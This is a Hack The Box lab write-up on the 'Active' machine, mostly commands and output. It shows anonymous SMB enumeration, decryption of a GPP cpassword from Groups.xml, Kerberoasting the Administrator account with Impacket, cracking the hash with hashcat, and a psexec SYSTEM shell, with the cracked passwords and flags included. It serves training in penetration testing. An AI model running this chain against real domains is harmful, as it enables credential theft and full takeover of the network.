Active

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Nmap Scan

To begin, let's run an Nmap scan to identify the open ports and services on the target machine.

└─$ nmap -sC -sV -Pn -v 10.129.1.129

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-22 01:44:51Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1027/tcp  filtered IIS
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3283/tcp  filtered netassistant
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
49165/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time: 
|   date: 2024-10-22T01:45:47
|_  start_date: 2024-10-22T01:34:02

NSE: Script Post-scanning.
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Initiating NSE at 21:46
Completed NSE at 21:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.02 seconds
           Raw packets sent: 1521 (66.924KB) | Rcvd: 1052 (46.485KB)

Key results from the scan:

The server appears to be running Windows Server 2008 R2 SP1.
Several important ports are open, including DNS (53), Kerberos (88), LDAP (389), SMB (445), and RPC services.

Adding Host Entry

Next, add the target's domain to our /etc/hosts file to make subsequent interactions easier:

echo "10.129.1.129    active.htb" | sudo tee -a /etc/hosts

Enumerating SMB Shares

How many SMB shares are shared by the target? 7

To determine how many SMB shares, use smbclient:

└─$ smbclient -L  \\\\10.129.1.129\\    
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Results:

A total of 7 shares are available, including Replication and Users.
The Replication share allows anonymous read access.

You can also run nxc smb to enumerate shares

└─$ nxc smb active.htb -u '' -p '' --shares                             
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\: 
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON                        Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL                          Logon server share 
SMB         10.129.1.129    445    DC               Users

What is the name of the share that allows anonymous read access? Replication

Accessing the Replication Share

Which file has encrypted account credentials in it? Hint: It's an XML file. Groups.xml.

Method 1:

To dig deeper into ‘Replication’, I unleashed Netexec’s spider module. This handy tool crawls through the share, much like a spider exploring every nook and cranny of its web. It downloads files as it goes, which means I could sit back and let it gather all the goodies.

└─$ nxc smb active.htb -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\: 
SPIDER_PLUS 10.129.1.129    445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.1.129    445    DC               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.129.1.129    445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.1.129    445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.1.129    445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.1.129    445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON                        Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL                          Logon server share 
SMB         10.129.1.129    445    DC               Users                           
SPIDER_PLUS 10.129.1.129    445    DC               [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.1.129.json".
SPIDER_PLUS 10.129.1.129    445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.1.129    445    DC               [*] SMB Readable Shares:  1 (Replication)
SPIDER_PLUS 10.129.1.129    445    DC               [*] Total folders found:  22
SPIDER_PLUS 10.129.1.129    445    DC               [*] Total files found:    7
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size average:    1.16 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.129.1.129    445    DC               [*] File size max:        3.63 KB
SPIDER_PLUS 10.129.1.129    445    DC               [*] File unique exts:     4 (.xml, .inf, .pol, .ini)
SPIDER_PLUS 10.129.1.129    445    DC               [*] Downloads successful: 7
SPIDER_PLUS 10.129.1.129    445    DC               [+] All files processed successfully.

Method 2: Alternatively, you can access the share using smbclient, enable recursive listing and search for .xml files:

Get Groups.xml file

└─$ smbclient \\\\10.129.1.129\\Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

smb: \> recurse ON
smb: \> ls

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> mget Groups.xml
Get file Groups.xml? yes
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit

Decrypting the Password

Upon opening the Groups.xml we can see an encrypted cpassword for the user active.htb\SVC_TGS

└─$ cat Groups.xml                
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The Groups.xml file is identified as a Group Policy Preferences (GPP) file, which stores passwords encrypted with AES-256. We use the gpp-decrypt tool to retrieve the password:

└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

What is the decrpyted password for the SVC_TGS account? GPPstillStandingStrong2k18

Validating Credentials

With the username SVC_TGS and the decrypted password, validate access using nxc smb:

└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18               
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

The credentials are valid, and we can now access additional shares, including the Users share.

└─$ nxc smb active.htb -u 'SVC_TGS' -p GPPstillStandingStrong2k18 --shares
SMB         10.129.1.129    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.1.129    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.1.129    445    DC               [*] Enumerated shares
SMB         10.129.1.129    445    DC               Share           Permissions     Remark
SMB         10.129.1.129    445    DC               -----           -----------     ------
SMB         10.129.1.129    445    DC               ADMIN$                          Remote Admin
SMB         10.129.1.129    445    DC               C$                              Default share
SMB         10.129.1.129    445    DC               IPC$                            Remote IPC
SMB         10.129.1.129    445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.1.129    445    DC               Replication     READ            
SMB         10.129.1.129    445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.1.129    445    DC               Users           READ

Retrieving User Flag

Using smbclient, we connect to the Users share to retrieve the user.txt file.

Navigate to the SVC_TGS\Desktop directory, find the user.txt and download it.

└─$ smbclient \\\\10.129.1.129\\Users --user=active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 5204078 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

                10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Mon Oct 21 21:34:59 2024

                10459647 blocks of size 4096. 5204078 blocks available
smb: \SVC_TGS\Desktop\> cat user.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
Get file user.txt? yes
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

The User Flag is

└─$ cat user.txt      
43d6c8971545f31bf3e0dc8fea6afcfd

Kerberoasting

To escalate privileges, we attempt a Kerberoasting attack. Before proceeding further, we need to ensure our system clock is in sync with the Domain Controller, as time synchronisation is crucial for handling Kerberos tickets. We use ntpdate to synchronise our clock with the DC:

└─$ sudo ntpdate active.htb   
2024-10-21 22:47:07.748134 (-0400) -0.512112 +/- 0.077772 active.htb 10.129.1.129 s1 no-leap
CLOCK: time stepped by -0.512112

We then use Impacket's GetUserSPNs.py to locate Kerberoastable users:

└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.129.1.129 active.htb/SVC_TGS
[sudo] password for kali: 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-10-21 21:35:03.826139             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7bfdbdc27439d277426bc8ae765034354f2075d062657995370408e9eb10ad117a934f040434bc111fcef520e888f5ece36a2ce4d94b0f5b575fff1664f77b13eaf03fc17dc4188b6f7a0455d29aaa2c2163a3b7d1eb27ed78d2f2fa306cfc42894679a3984f663ace6cb6760a98dac6e4401a20cd9b8c2ca476807f3b6c5b29dec1880908444513ec8e6df77f91e29e9ce4dd407eaf106ca89f730d0881420c9ac9df47791bf5c179c5d70645132624ba76c15b0fccf9c19d1b1ef6600e86d8b9c098ce7def46f9f55a2c945cb2ceb4eed84b5417040f62f8828c18e894f63feb7182391c7bc3d585b2063b1c06591d413ffa0e58a68742e5382cd50a6f18eeefdf122dd34888acd029380947278afa274ed09c8fac3c8ce9a042703d07008e387848af1afc2b9125d261e1553a4e8503eddba2cb0d81b47d8aa44fd408d89a40d186953cc9d03e73e29b936a8ed403a22496c86c62fc142a786fd613f272476132d5e0a54099f91021b2835a6433d4113f5fd0567062e8e9f863f0322b58bf0cef8d4dc6f6dfcab472b401fe44158d48fcdc2509995efc92a8e270204cb1b86669dfcfdb9cb39206fed27c135d0c4426e55fd17380c2e4065fb7a1a79b4ad6b126d16399cb51bc438756242247eded65439c315fcfe189b0b6e728b4f7af159548d89906d7093329371ba550ff69146dcff3f047dd8697191707d59efa2dfb89da3079c482024d1a3b67d8bc052d7c20752ef180d2dd2a473380c6e02fb0265b75ca9a87a62b92be9d73fafcd367077f661b2afd8fde73ac97d103ac8b9ea979cbe39c4787b8f92b73c7630bc6f2eb196e4a31dcb1c43fda5933e181cc99b4a316efe58ca562b9e2bda9ce04cc510adc0d0d3b8ba90c5d885b8ec249e5f977d1bf68aba0df7e4284a65eabaab386e8b6949ba906de39e9e29c997a364566b5d116a4eca290fd34e75b3405de0ff637998214d10a361c3bae032cee496e6937cb364ab007cc90aa5b003cc7eac18f4a3f7d32b082c3a060d73c72deb52b0bb1df649862a1f218be6758fd19cacb92d5fc3b7c44a400f9bfcb5167701e3b425078b0902fbe9c7703ffb4c29953ee939772685dc1743147346f2def8f8ab870f5ec2cb0b3c88c0c63b02f01745281a4b3894d0f704e7a2d8ad78b2bb7c691de9669b19a7fc92103827c27c4d8c8c04b7567cb044b174f4ed01f712bd059909008d960859740c4163f59bfd994067fffcf0badc0

Which service account on Active is vulnerable to Kerberoasting? Administrator

A TGS-REP hash for the Administrator account is found. Save this hash to a file and use Hashcat to crack it.

To find out the hashcat module number, run:

hashcat --help | grep -i "Kerberos"
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocol

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2f39588c61c27598a34967c8a41c5929$494a55ffbf2b8b7bfdbdc27439d277426bc8ae765034354f2075d062657995370408e9eb10ad117a934f040434bc111fcef520e888f5ece36a2ce4d94b0f5b575fff1664f77b13eaf03fc17dc4188b6f7a0455d29aaa2c2163a3b7d1eb27ed78d2f2fa306cfc42894679a3984f663ace6cb6760a98dac6e4401a20cd9b8c2ca476807f3b6c5b29dec1880908444513ec8e6df77f91e29e9ce4dd407eaf106ca89f730d0881420c9ac9df47791bf5c179c5d70645132624ba76c15b0fccf9c19d1b1ef6600e86d8b9c098ce7def46f9f55a2c945cb2ceb4eed84b5417040f62f8828c18e894f63feb7182391c7bc3d585b2063b1c06591d413ffa0e58a68742e5382cd50a6f18eeefdf122dd34888acd029380947278afa274ed09c8fac3c8ce9a042703d07008e387848af1afc2b9125d261e1553a4e8503eddba2cb0d81b47d8aa44fd408d89a40d186953cc9d03e73e29b936a8ed403a22496c86c62fc142a786fd613f272476132d5e0a54099f91021b2835a6433d4113f5fd0567062e8e9f863f0322b58bf0cef8d4dc6f6dfcab472b401fe44158d48fcdc2509995efc92a8e270204cb1b86669dfcfdb9cb39206fed27c135d0c4426e55fd17380c2e4065fb7a1a79b4ad6b126d16399cb51bc438756242247eded65439c315fcfe189b0b6e728b4f7af159548d89906d7093329371ba550ff69146dcff3f047dd8697191707d59efa2dfb89da3079c482024d1a3b67d8bc052d7c20752ef180d2dd2a473380c6e02fb0265b75ca9a87a62b92be9d73fafcd367077f661b2afd8fde73ac97d103ac8b9ea979cbe39c4787b8f92b73c7630bc6f2eb196e4a31dcb1c43fda5933e181cc99b4a316efe58ca562b9e2bda9ce04cc510adc0d0d3b8ba90c5d885b8ec249e5f977d1bf68aba0df7e4284a65eabaab386e8b6949ba906de39e9e29c997a364566b5d116a4eca290fd34e75b3405de0ff637998214d10a361c3bae032cee496e6937cb364ab007cc90aa5b003cc7eac18f4a3f7d32b082c3a060d73c72deb52b0bb1df649862a1f218be6758fd19cacb92d5fc3b7c44a400f9bfcb5167701e3b425078b0902fbe9c7703ffb4c29953ee939772685dc1743147346f2def8f8ab870f5ec2cb0b3c88c0c63b02f01745281a4b3894d0f704e7a2d8ad78b2bb7c691de9669b19a7fc92103827c27c4d8c8c04b7567cb044b174f4ed01f712bd059909008d960859740c4163f59bfd994067fffcf0badc0:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked

The cracked password is: Ticketmaster1968

Gaining Administrative Access

With the Administrator credentials, we use Impacket's psexec to gain a shell as nt authority\system:

└─$ impacket-psexec administrator@10.129.1.129
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Requesting shares on 10.129.1.129.....
[*] Found writable share ADMIN$
[*] Uploading file SZHVJVMK.exe
[*] Opening SVCManager on 10.129.1.129.....
[*] Creating service QaoB on 10.129.1.129.....
[*] Starting service QaoB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Once connected, we retrieve the root.txt flag from the Administrator's desktop:

C:\Users\Administrator\Desktop> type root.txt
8e97770dadbd61a37a8e041332d5e98d

C:\Users\Administrator\Desktop> ipconfig /all
 
Windows IP Configuration

   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : active.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : active.htb
                                       .htb

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-A1-0A
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.129.1.129(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
   Lease Obtained. . . . . . . . . . : ��嫞, 22 ������妬 2024 4:33:55 ��

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
   Lease Expires . . . . . . . . . . : ��嫞, 22 ������妬 2024 6:33:56 ��

   Default Gateway . . . . . . . . . : 10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DNS Servers . . . . . . . . . . . : 127.0.0.1
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\Users\Administrator\Desktop> whoami
nt authority\system

References

https://medium.com/@sanskarkalra121/cracking-active-unmasking-the-gpp-passwords-and-roasting-my-way-to-admin-access-ff439b9995c9